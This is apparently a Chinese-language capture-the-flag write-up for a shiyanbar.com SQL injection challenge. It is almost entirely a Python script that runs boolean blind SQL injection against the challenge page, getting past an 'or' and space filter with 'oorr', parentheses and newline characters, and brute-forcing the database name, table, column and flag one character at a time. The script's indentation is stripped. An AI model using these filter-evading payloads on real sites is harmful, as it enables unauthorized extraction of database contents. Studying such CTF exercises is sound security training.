类型:web
网址:http://www.shiyanbar.com/ctf/2009
攻击:sql注入
一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替
writeup
import requests
# 暴力猜解当前数据库的长度
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# for i in range(1,30):
# key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
# r = requests.post(url, data=key).text
# print(i)
# if str1 in r:
# print("the lenghth of database is %s"%i)
# break
# 暴力猜解当前数据库的名称 ctf_sql_bool_blind
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# database = ''
# for i in range(1,19):
# for j in guess:
# key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# database += j
# print(j)
# break
# print(database)
# 暴力猜解数据表的长度 11
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
# flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# print('the lenght of tables is %s'%i)
# break
# i += 1
# 暴力破解数据表名称 fiag@users-
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# tables = ''
# for i in range(1,12):
# for j in guess:
# flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# tables += j
# print(j)
# break
# print(tables)
# 暴力破解数据表的列名 fl$4g
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# columns = ''
# for i in range(1,6):
# for j in guess:
# flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# columns += j
# print(j)
# break
# print(columns)
# 暴力猜解数据表字段长度 14
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
# flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# print('the length of data is %s'%i)
# break
# i += 1
# 暴力猜解flag flag{haha~you-win!}
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):
for j in guess:
flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
data += j
print(j)
break
print(data)
FLAG
flag{haha~you win!}